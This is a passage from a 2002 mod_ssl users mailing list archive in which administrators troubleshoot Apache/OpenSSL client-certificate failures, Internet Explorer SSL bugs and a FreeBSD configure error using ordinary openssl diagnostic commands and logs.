Mon, 11 Mar 2002 17:47:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from brunog.spinweb.net id RAA25811; Mon, 11 Mar 2002 17:46:15 +0100 (MET) Received: from xbridge.com (xbridgelimited-2.dsl.easynet.co.uk [212.135.187.146]) by brunog.spinweb.net (8.11.6) id g2BGk8L24595; Mon, 11 Mar 2002 16:46:09 GMT Message-ID: <3C8CDF29.6060208@xbridge.com> Date: Mon, 11 Mar 2002 16:45:29 +0000 From: Bruno Georges User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20010923 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users , "'servletexec-interest@mail.newatlanta.com'" Subject: Problem with reading client certificate - downgrade doens't seem to work Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Bruno Georges X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Some of our users have the following problem: when users are submiting their order[https and POST], the app send the confirmation page but nothing is displayed on the user's browser. First here is our stting: OS: Solaris 2.7 Web Sever: Apache 1.3.23 + mod_ssl-2.8.7-1.3.23 + openssl-0.9.6c App server: NewAtlanta ServletExec 4.1 apache vhost config: ------------------------ ... SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 ... Our logs show for 2 of the failing requests [I replaced IPs with Browser1 and Browser2]: SSL LOG: ------------ [11/Mar/2002:11:21:51 +0000] Browser1 TLSv1 RC4-MD5 "GET /main HTTP/1.1" 14514 [11/Mar/2002:15:26:29 +0000] Browser2 SSLv3 RC4-MD5 "POST /main HTTP/1.1" 23618 Apache Logs shows the folowing User Agents: ------------------------------------------------------ Browser1: Mozilla/4.0 (compatible;MSIE 6.0; AOL 7.0; Windows 98) Browser2: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) app server logs show: ------------------------- [Mon Mar 11 11:20:32 GMT 2002] Unknown certificate data: [Mon Mar 11 11:20:32 GMT 2002] ClientCert: oop init: java.util.NoSuchElementException [Mon Mar 11 11:20:32 GMT 2002] java.util.NoSuchElementException [Mon Mar 11 11:20:32 GMT 2002] at java.util.StringTokenizer.nextToken(StringTokenizer.java:235) [Mon Mar 11 11:20:32 GMT 2002] at com.newatlanta.servletexec.ClientCert.parseCert(ClientCert.java:204) .... Retrieving the client certificate data [Mon Mar 11 15:26:28 GMT 2002] java.net.SocketException: Connection reset by peer: Connection reset by peer [Mon Mar 11 15:26:28 GMT 2002] at java.net.SocketInputStream.socketRead(Native Method) [Mon Mar 11 15:26:28 GMT 2002] at java.net.SocketInputStream.read(SocketInputStream.java:90) It looks like it is not possible to get anything from the client, and the connection is broken. I am a bit confused, according to the SetEnvIf directive IE response should be HTTP/1.0, also we force the form method to POST, which has no effect. Thanks for any help. Bruno Georges ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 11 19:03:39 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA00245; Mon, 11 Mar 2002 19:03:02 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id TAA00149; Mon, 11 Mar 2002 19:01:27 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 555D74CE74B; Mon, 11 Mar 2002 19:01:26 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2BG6vw27341; Mon, 11 Mar 2002 17:06:57 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id QAA23819; Mon, 11 Mar 2002 16:58:10 +0100 (MET) Date: Mon, 11 Mar 2002 16:58:10 +0100 (MET) Message-Id: <200203111558.QAA23819@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] About CRL (PR#672) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Shiva murugesan Version: 2.8.5 OS: unix Submission from: (NULL) (213.132.36.114) Env : Apache/1.3.22 (Unix) mod_ssl/2.8.5 OpenSSL/0.9.6c. When IE browser (5.0,5.5, 6.0 )client presents an expired/revoked certficate the modssl handsake fails and the IE browser does not display the correct error message, it just displays generic error "Page can not be displayed". Whereas NE displays the correct error message as "The certificate has expired / revoked". Please help me in finding the solution to display correct error message in IE browser as well. Please find the error_log as follows >>>> Certificate Verification: Error (10) >>>> : certificate has expired >>>> [Mon Mar 11 19:01:51 2002] [error] mod_ssl: SSL >>>> handshake failed (server 158.234 >>>> .197.20:443, client 158.234.197.53) (OpenSSL library >>>> error follows) >>>> [Mon Mar 11 19:01:51 2002] [error] OpenSSL: >>>> error:140890B2:SSL routines:SSL3_GET >>>> _CLIENT_CERTIFICATE:no certificate returned Also the httpd.conf file entries as follows ServerName 158.234.197.20 DocumentRoot "/usr/local/apache/htdocs" ServerAdmin murugesans@logica.com ErrorLog /usr/local/apache/logs/error_log TransferLog /usr/local/apache/logs/access_log SSLEngine on SSLCertificateFile /usr/local/apache/conf/ssl.crt/server.crt SSLCertificateKeyFile /usr/local/apache/conf/ssl.key/server.key SSLCertificateChainFile /usr/local/apache/conf/ssl.crt/server.crt SSLCACertificateFile /usr/local/apache/conf/ssl.crt/veriandgte.pem SSLCARevocationFile /usr/local/apache/conf/ssl.crl/verisigncacrl.pem #SSLCARevocationFile /usr/local/apache/conf/ssl.crl/2.pem SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdownan-shutdown downgrade-1.0 fo SSLVerifyClient require:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULLSA-DES-CBC-SHA:EDH- SSLVerifyDepth 10 #SSLRequire (%{SSL_CLIENT_I_DN_OU} in { "shiva", "raja","Comtrust"}) SSLRequire %{SSL_CIPHER} >= 128 CustomLog "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" Thanks and regards shiva ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 11 19:57:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA03320; Mon, 11 Mar 2002 19:56:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.joemagee.com id TAA03228; Mon, 11 Mar 2002 19:55:19 +0100 (MET) Date: Mon, 11 Mar 2002 13:54:58 -0500 Message-Id: <200203111354.AA107282554@mail.joemagee.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Joe Magee" X-Sender: To: Subject: Post ./configure issue with BSD and apache_1.3.22 X-Mailer: Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Joe Magee" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello all, I'm new to the mod_ssl world... I'm trying to setup mod_ssl 2.8.5 with apache_1.3.22. Im running FreeBSD 4.5-RELEASE I seem to be having trouble when setting the "SSL_BASE=" part of the configuration. When I attempt to type in SSL_BASE= I get file not found... If I do an ls in the apache_1.3.22 directory I donot see any files that refer to SSL_BASE= I've scowered google and the archives looking for a resolution. If anyone could lend me a hand I would greatly appreciate it. IMPORTANT NOTE: I already had a copy of apache_1.3.22 installed before doing this these steps. I'm not sure if that impacts this issue. I've already installed openssl-0.9.6b by doing hte following: # cd openssl-0.9.6b # sh config # make # make test # make install Then I installed mod_ssl by: # cd ../mod_ssl-2.8.5-1.3.22 # ./configure --with-apache=../apache_1.3.22 snortsensor# cd ../mod_ssl-2.8.5-1.3.22 snortsensor# ./configure --with-apache=../apache_1.3.22 Configuring mod_ssl/2.8.5 for Apache/1.3.22 + Apache location: ../apache_1.3.22 (Version 1.3.22) + Auxiliary patch tool: ./etc/patch/patch (local) + Applying packages to Apache source tree: o Extended API (EAPI) o Distribution Documents o SSL Module Source o SSL Support o SSL Configuration Additions o SSL Module Documentation o Addons Done: source extension and patches successfully applied. Now proceed with the following commands (Bourne-Shell syntax): $ cd ../apache_1.3.22 $ SSL_BASE=/path/to/openssl ./configure ... --enable-module=ssl $ make $ make certificate $ make install #------------------------------------------ #Here is where the problem seems to occur: #------------------------------------------ snortsensor# cd ../apache_1.3.22 snortsensor# SSL_BASE=../openssl-0.9.6b/ \ ? ./configure --enable-module=ssl \ ? --enable-module=so \ ? --prefix=/usr/local/www/ SSL_BASE=../openssl-0.9.6b/: Command not found. I also tryed typing in: SSL_BASE=../openssl-0.9.6b/ ./configure --enable-module=ssl --enable-module=so --prefix=/usr/local/www/ SSL_BASE=../openssl-0.9.6b/: Command not found. Thanks all! Joe Magee ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 11 20:34:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA05107; Mon, 11 Mar 2002 20:33:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from opiate.divisionbyzero.com id UAA05056; Mon, 11 Mar 2002 20:32:29 +0100 (MET) Received: from devotchka.sonicopia.com (adsl-63-194-199-37.dsl.snfc21.pacbell.net [63.194.199.37]) by opiate.divisionbyzero.com (Postfix) with ESMTP id 1111E6F928 for ; Mon, 11 Mar 2002 11:34:24 -0800 (PST) Subject: Re: Problem with reading client certificate - downgrade doens't seem to work From: jon schatz To: modssl-users@modssl.org In-Reply-To: <3C8CDF29.6060208@xbridge.com> References: <3C8CDF29.6060208@xbridge.com> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-s19Swh8+tQZEEsptzAnL" X-Mailer: Evolution/1.0.2 Date: 11 Mar 2002 11:31:10 -0800 Message-Id: <1015875070.29119.3.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-s19Swh8+tQZEEsptzAnL Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Mon, 2002-03-11 at 08:45, Bruno Georges wrote: > It looks like it is not possible to get anything from the client, and=20 > the connection is broken. > I am a bit confused, according to the SetEnvIf directive IE response=20 > should be HTTP/1.0, also we force the form method to POST, which has no=20 > effect. I had this problem w/ 1.3.20 + 1.3.22 + the appropriate mod_ssl + mod_perl-1.2.26 on linux systems. It "magically" fixed itself with the release of apache-1.3.23 + mod_ssl-2.8.6. Try this and see what happens (to see if your setenvif is working): [jon@devotchka jon]$ openssl s_client -quiet -connect devotchka:23456 < GET / HTTP/1.1 > Host: devotchka > User-Agent: Mozilla/4.0 Compatible (MSIE) >=20 > EOF Inside of my reply, I get (among other things): > HTTP/1.0 200 OK > Date: Mon, 11 Mar 2002 19:27:28 GMT > Server: Apache/1.3.23 (Unix) mod_ssl/2.8.6 OpenSSL/0.9.6b > mod_perl/1.26 I haven't upgraded to 2.8.7 yet, so i wonder if this problem was reintroduced.... -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-s19Swh8+tQZEEsptzAnL Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8jQX+wj1gFegse14RAjO4AJ90OULtd1fNu0w0CTvbJoLjvKOhtQCghjJ4 /ZRcW0yKiIS6BddO+BleSPQ= =hc2d -----END PGP SIGNATURE----- --=-s19Swh8+tQZEEsptzAnL-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 11 23:45:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA12719; Mon, 11 Mar 2002 23:44:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pascal.arago.de id XAA12673; Mon, 11 Mar 2002 23:43:19 +0100 (MET) Received: Received: (from uucp@localhost) by pascal.arago.de id g2BMhIe6426864 for modssl-users@modssl.org; Mon, 11 Mar 2002 23:43:18 +0100 (MET) Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de" via SMTP by pascal.arago.de, id smtpdAAAa0Oi9_; Mon Mar 11 23:43:08 2002 Received: from ohm.arago.de (localhost [127.0.0.1]) by carat.arago.de (8.9.3/8.9.3) with SMTP id XAA14830 for ; Mon, 11 Mar 2002 23:41:25 +0100 (MET) Received: (from gryf@localhost) by ohm.arago.de (SGI-8.9.3/8.9.3) id XAA25246 for modssl-users@modssl.org; Mon, 11 Mar 2002 23:43:07 +0100 (MET) Date: Mon, 11 Mar 2002 23:43:07 +0100 From: Thomas Binder To: modssl-users@modssl.org Subject: Re: Post ./configure issue with BSD and apache_1.3.22 Message-ID: <20020311234307.A10102483@ohm.arago.de> Mail-Followup-To: modssl-users@modssl.org References: <200203111354.AA107282554@mail.joemagee.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200203111354.AA107282554@mail.joemagee.com>; from lists@joemagee.com on Mon, Mar 11, 2002 at 01:54:58PM -0500 Organization: arago GmbH Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Thomas Binder X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi! On Mon, Mar 11, 2002 at 01:54:58PM -0500, Joe Magee wrote: > snortsensor# SSL_BASE=../openssl-0.9.6b/ \ > ? ./configure --enable-module=ssl \ > ? --enable-module=so \ > ? --prefix=/usr/local/www/ > SSL_BASE=../openssl-0.9.6b/: Command not found. You're using a csh'ish shell, but for the above construct to work as expected you need to use an sh-compatible one, e.g. sh, ksh, bash, etc. Ciao Thomas -- If you can keep your head when all about you are losing theirs, then you clearly don't understand the situation. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 12 00:03:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA13780; Tue, 12 Mar 2002 00:02:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from zeus.epr.com id AAA13734; Tue, 12 Mar 2002 00:01:32 +0100 (MET) Received: from exchange.epr.com (exchange.epr.com [198.3.162.249]) by zeus.epr.com (8.11.6/8.11.6) with ESMTP id g2BMtch12272 for ; Mon, 11 Mar 2002 14:55:38 -0800 (PST) Received: by exchange.epr.com with Internet Mail Service (5.5.2653.19) id ; Mon, 11 Mar 2002 15:00:55 -0800 Message-ID: <3C124172E7FDD511B510000347426D592DD6BD@exchange.epr.com> From: Lily Tian To: "'modssl-users@modssl.org'" Subject: OpenSSL: error:14094416: SSL routines: SSL3_READ_BYTES:sslv3 aler t certificate unknow. Date: Mon, 11 Mar 2002 15:00:54 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Lily Tian X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have Apache + SSL + Tomcat setup on Solaris 2.8 and try to run some tests. While I try to connect to server by using https://hostname:8443/crfs, The connection is refused. Here is the error message from ssl_engine_log on apache/logs. [11/Mar/2002 10:42:21 28191] [error] SSL handshake failed (server titan.xxxxx.com:8443, client 10.1.100.12) (OpenSSL library error follows) [11/Mar/2002 10:42:21 28191] [error] OpenSSL: error:14094416:SSL routines:SSL3_READ_BYTES:sslv3 alert certificate unknown Any idea what goes wrong here? Thanks a lot in advance. Lily If you can keep your head when all about you are losing theirs, then you clearly don't understand the situation. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 12 01:23:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA18612; Tue, 12 Mar 2002 01:22:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bulk.resource.org id BAA18579; Tue, 12 Mar 2002 01:21:13 +0100 (MET) Received: from bulk.resource.org (localhost.resource.org [127.0.0.1]) by bulk.resource.org (8.12.2/8.12.2) with ESMTP id g2C0Kwlp018995 for ; Mon, 11 Mar 2002 16:20:58 -0800 (PST) Received: (from bburdick@localhost) by bulk.resource.org (8.12.2/8.12.2/Submit) id g2C0KwYU018994 for modssl-users@modssl.org; Mon, 11 Mar 2002 16:20:58 -0800 (PST) From: Brad Burdick Message-Id: <200203120020.g2C0KwYU018994@bulk.resource.org> Subject: Re: OpenSSL: error:14094416: SSL routines: SSL3_READ_BYTES:sslv3 aler t certificate unknow. In-Reply-To: <3C124172E7FDD511B510000347426D592DD6BD@exchange.epr.com> To: modssl-users@modssl.org Date: Mon, 11 Mar 2002 16:20:58 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL94 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Brad Burdick X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users [ Charset ISO-8859-1 unsupported, converting... ] > Hi, > > I have Apache + SSL + Tomcat setup on Solaris 2.8 and try to run some > tests. While I try to connect to server by using > https://hostname:8443/crfs, The connection is refused. > Here is the error message from ssl_engine_log on apache/logs. > > [11/Mar/2002 10:42:21 28191] [error] SSL handshake failed (server > titan.xxxxx.com:8443, client 10.1.100.12) (OpenSSL library error follows) > [11/Mar/2002 10:42:21 28191] [error] OpenSSL: error:14094416:SSL > routines:SSL3_READ_BYTES:sslv3 alert certificate unknown > > Any idea what goes wrong here? i was seeing similar errors with apache 1.3.23 + mod_ssl-2.8.6. they went away after i switched to mod_ssl-2.8.7. i only saw the errors when connecting with netscape/mozilla or IE clients. openssl s_client mode and curl could retrieve the SSL page without problem. i was using a test certificate signed by the snake oil CA that comes with apache. -brad -- Brad Burdick | bburdick@media.org http://media.org/ | The medium is NOT the message ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 12 03:57:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA23592; Tue, 12 Mar 2002 03:56:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from troy.barwonwater.vic.gov.au id DAA23563; Tue, 12 Mar 2002 03:55:07 +0100 (MET) Received: from barwonwater.vic.gov.au (hamilton.is.barwonwater.vic.gov.au [138.19.8.48]) by troy.barwonwater.vic.gov.au (8.9.3+Sun/8.9.3) with ESMTP id NAA18483 for ; Tue, 12 Mar 2002 13:55:01 +1100 (EST) Message-ID: <3C8D6E05.2020803@barwonwater.vic.gov.au> Date: Tue, 12 Mar 2002 13:55:01 +1100 From: Chris Welsh Organization: Barwon Water User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.7) Gecko/20020104 X-Accept-Language: en-us MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: MSIE broken SSL implementation - problems with mod_ssl / openssl References: <4.3.2.7.2.20020306111756.0474a970@opal.he.net> <3C88B971.D94D6377@ubizen.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Chris Welsh X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks Carl, I've noticed my problem goes away when I add the host name that matches the host name on the crt installed on the ssl server (tintagel) into the window's "hosts" file. As currently the crt I am using is on the test host (and will move to the production host). So when I fool the client that tintagel is really www.barwonwater.vic.gov.au. All works. Thanks for the info. I'll use it. Carl D'Halluin wrote: >Hello Christopher, > >I looked around on the www and this is our official statement towards our customers. Maybe >you can re-use it :-) > >---- >SSL Problem with certain versions of Internet Explorer / Internet Information Server > >Certain versions of Internet Explorer contain bugs which >cause an incompatibility with all servers having an SSL implementation based on openssl. >This includes all Apache webservers and commercial products based on Apache, such >as certain Oracle servers, Ubizen DMZ/Shield 3.0 and higher, and many other products. > >This bug may also affect certain low-crypto distributions of Internet Information Server. > >Typical error messages experienced by the clients are : > Internet Explorer 4.x > The server returned an invalid or unrecognized response > Internet Explorer 5.x > Cannot find server or DNS Error > >The bugs are caused by a certain Windows dll file, which influences all SSL software >on the client machines (or on the IIS server machine). The bug has been around for >more than two years, and Microsoft is well aware of this problem. They admit their mistake >and have an entire support page dedicated to it, containing a patch. > >Customers experiencing problems with Internet Explorer when using SSL, are recommended >to go to the Microsoft patch page, and to install the fix. > >The bug and its patch are very clearly documented at >http://support.microsoft.com/default.aspx?scid=kb;EN-US;q247367 >--- > >Greetings, > >Carl > > >Christopher Taranto wrote: > >>Hi Carl, >> >>Unfortunately, I have had no luck in tracking down or fixing this >>problem. And it's really a big problem in my opinion. I haven't had >>enough time to really dig deep on the using openssl to debug the connection >>- but I don't really know what I would be looking for >>specifically. Fortunately (I guess otherwise I would have a special bald >>spot on my head!), I have access to a broken MSIE browser available in my >>office that I can use to repeatedly test the server for errors - so there >>is a way of trying to find the problem. >> >>Here is what I have tried: >> >>openssl s_server -accept 4443 -WWW -cert >>/usr/local/apache/conf/ssl.crt/www.condoms.net.crt -key >>/usr/local/apache/conf/ssl.key/www.condoms.net.key -state -debug >> >>When I use this, I get this: >> >>Using default temp DH parameters >>ACCEPT >> >>and the system waits for me forever - and I am not sure what to put in. >> >>openssl s_client -connect condoms.net:443 >> >>CONNECTED(00000003) >>depth=0 /C=US/ST=California/L=San Francisco/O=Condom >>Sense/OU=DN/CN=www.condoms.net >>verify error:num=20:unable to get local issuer certificate >>verify return:1 >>depth=0 /C=US/ST=California/L=San Francisco/O=Condom >>Sense/OU=DN/CN=www.condoms.net >>verify error:num=27:certificate not trusted >>verify return:1 >>depth=0 /C=US/ST=California/L=San Francisco/O=Condom >>Sense/OU=DN/CN=www.condoms.net >>verify error:num=21:unable to verify the first certificate >>verify return:1 >>--- >>Certificate chain >> 0 s:/C=US/ST=California/L=San Francisco/O=Condom >>Sense/OU=DN/CN=www.condoms.net >> i:/C=US/O=RSA Data Security, Inc./OU=Secure Server Certification Authority >>--- >>Server certificate >>-----BEGIN CERTIFICATE----- >>MIID0zCCA0CgAwIBAgIQWlU/retDZkl/izm7HTNt4TANBgkqhkiG9w0BAQQFADBf >>MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXUlNBIERhdGEgU2VjdXJpdHksIEluYy4x >>LjAsBgNVBAsTJVNlY3VyZSBTZXJ2ZXIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkw >>HhcNMDExMTI1MDAwMDAwWhcNMDIxMTI4MjM1OTU5WjB4MQswCQYDVQQGEwJVUzET >>MBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxQNU2FuIEZyYW5jaXNjbzEVMBMG >>A1UEChQMQ29uZG9tIFNlbnNlMQswCQYDVQQLFAJETjEYMBYGA1UEAxQPd3d3LmNv >>bmRvbXMubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC91jpQDQ/gzKLn >>u4BLU9rkzp9RPVSTo10u/A7j4nBGHv9oJrswuNxJA5oyNF/naTHX0xNuzWK9LL7A >>cK/VwciZIHRCXkQq7Xh4pWbdOjRFBhKRmgt0L2roBggPx+ecaH+sUdNOqQvDq68n >>0iyVCgnNEmGzTfIKiBN5dVJbHNTOnwIDAQABo4IBeTCCAXUwCQYDVR0TBAIwADAL >>BgNVHQ8EBAMCBaAwPAYDVR0fBDUwMzAxoC+gLYYraHR0cDovL2NybC52ZXJpc2ln >>bi5jb20vUlNBU2VjdXJlU2VydmVyLmNybDCBrAYDVR0gBIGkMIGhMIGeBgtghkgB >>hvhFAQcBATCBjjAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cudmVyaXNpZ24uY29t >>L0NQUzBiBggrBgEFBQcCAjBWMBUWDlZlcmlTaWduLCBJbmMuMAMCAQEaPVZlcmlT >>aWduJ3MgQ1BTIGluY29ycC4gYnkgcmVmZXJlbmNlIGxpYWIuIGx0ZC4gKGMpOTcg >>VmVyaVNpZ24wHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMBkGCmCGSAGG >>+EUBBg8ECxYJOTI2MDIyNDI3MDQGCCsGAQUFBwEBBCgwJjAkBggrBgEFBQcwAYYY >>aHR0cDovL29jc3AudmVyaXNpZ24uY29tMA0GCSqGSIb3DQEBBAUAA34APutHvd2q >>aMtbW9hBuGRxGdMie9mgwQgcJC+8TX24M8eg9xKGHdk3u5sURI+I1tNgPRoeeVB0 >>TKSgiIHkkYhiCEoQD6aJyRisaVeI4wI8NC1qXSSRcuDDra+52lPUQK9hMIpvzENo >>XV0Cj0KnaPVqkfr/4zRrU9UTE370Jqg= >>-----END CERTIFICATE----- >>subject=/C=US/ST=California/L=San Francisco/O=Condom >>Sense/OU=DN/CN=www.condoms.net >>issuer=/C=US/O=RSA Data Security, Inc./OU=Secure Server Certification Authority >>--- >>No client certificate CA names sent >>--- >>SSL handshake has read 1539 bytes and written 314 bytes >>--- >>New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA >>Server public key is 1024 bit >>SSL-Session: >> Protocol : TLSv1 >> Cipher : EDH-RSA-DES-CBC3-SHA >> Session-ID: >>2917B720C36856CC4B2CB63951F9502C449D28905F58FFFF56BF2418AA916E74 >> Session-ID-ctx: >> Master-Key: >>8DB2F877627C8AEE402DBC388F9ACB72C397637E70C87D43AFD7735E2949827C4AAFA6903D88BA7F3B99AFBFAD5BECE4 >> Key-Arg : None >> Start Time: 1015525852 >> Timeout : 300 (sec) >> Verify return code: 21 (unable to verify the first certificate) >>--- >> >> >>Seems like Microsoft deliberately put some broken SSL implementation in >> >>Seems pretty amazing to me that all of the commercial servers that use >>mod_ssl as a base would or wouldn't have this same issue - but I have not >>heard of any problems like this with other apache servers like Raven, >>Stronghold, etc... Maybe there are problems - but I have not been able to >>find any mention of them. And, it seems very convenient to MS in light of >>their IIS market share :-) >> >>My server configuration has already been posted in a previous message (let >>me know if you need me to repost it). >> >>Let me know if any of this makes sense to you or if you have any ideas. >> >>Sincerely, >> >>Christopher Taranto >> >>At 10:52 AM 3/6/02 +0100, you wrote: >> >>>Hello, >>> >>>I read your entries in a newsgroup. >>>I am having exactly the same problem, and I don't want to tell my users >>>"upgrade your browser, or use netscape". >>> >>>I wonder whether you finally found a solution to this embarassing >>>problem. >>>Seems like Microsoft deliberately put some broken SSL implementation in >>>their browser, in order to kill apache / openssl... >>> >>>Thx >>> >>>Carl D'Halluin >>>Security Engineer. >>> >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > -- regards, Christopher Welsh System Administrator, Voice:+61 03 52262385 Barwon Water, Geelong, Mobile: 0409 562968 3220, Vic, Australia Fax: +61 03 52210094 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 12 09:04:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA04815; Tue, 12 Mar 2002 09:03:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id JAA04785; Tue, 12 Mar 2002 09:02:51 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id AE9414CE755; Tue, 12 Mar 2002 09:02:50 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2C6D1b39165; Tue, 12 Mar 2002 07:13:01 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.gactr.uga.edu id UAA05762; Mon, 11 Mar 2002 20:55:54 +0100 (MET) Received: (qmail 11534 invoked from network); 11 Mar 2002 19:55:41 -0000 Received: from unknown (HELO gactr.uga.edu) ([10.10.100.125]) (envelope-sender ) by smtpgw.servers.nat (qmail-ldap-1.03) with SMTP for ; 11 Mar 2002 19:55:41 -0000 Message-ID: <3C8D0BBD.C5AD86FF@gactr.uga.edu> Date: Mon, 